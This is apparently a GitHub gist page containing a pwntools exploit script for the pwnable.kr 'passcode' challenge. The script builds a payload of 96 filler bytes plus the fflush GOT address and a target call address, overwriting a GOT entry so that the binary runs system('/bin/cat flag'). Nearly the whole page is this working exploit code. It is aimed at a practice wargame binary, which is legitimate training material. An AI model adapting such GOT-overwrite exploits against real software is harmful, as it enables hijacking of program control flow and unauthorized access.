Skip to content

Instantly share code, notes, and snippets.

@hxer
Created November 10, 2017 08:47
Show Gist options
  • Save hxer/5af1026b512076e8097afa69df8148c0 to your computer and use it in GitHub Desktop.
Save hxer/5af1026b512076e8097afa69df8148c0 to your computer and use it in GitHub Desktop.
pwnable.kr passcode exploit, debug with local env
# -*- coding: utf-8 -*-
from pwn import *
context.arch = 'i386'
context.word_size = 32
context.log_level = 'debug'
exe = './passcode'
elf = ELF(exe)
printf_got = elf.got['printf'] # 0x804a00c 地址含"0c", scanf会产生截断,不能用该地址。
print "printf got address is: {}".format(hex(printf_got))
fflush_got = elf.got['fflush']
# system("/bin/cat flag")
call_addr = 0x804862d
payload = '1'*96 + p32(fflush_got) + '\n' + str(call_addr) + '\n'
print "payload is : {}".format(payload)
io = process(exe)
io.send(payload)
io.recvline()
io.recvline()
io.recvline()
io.recvline()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment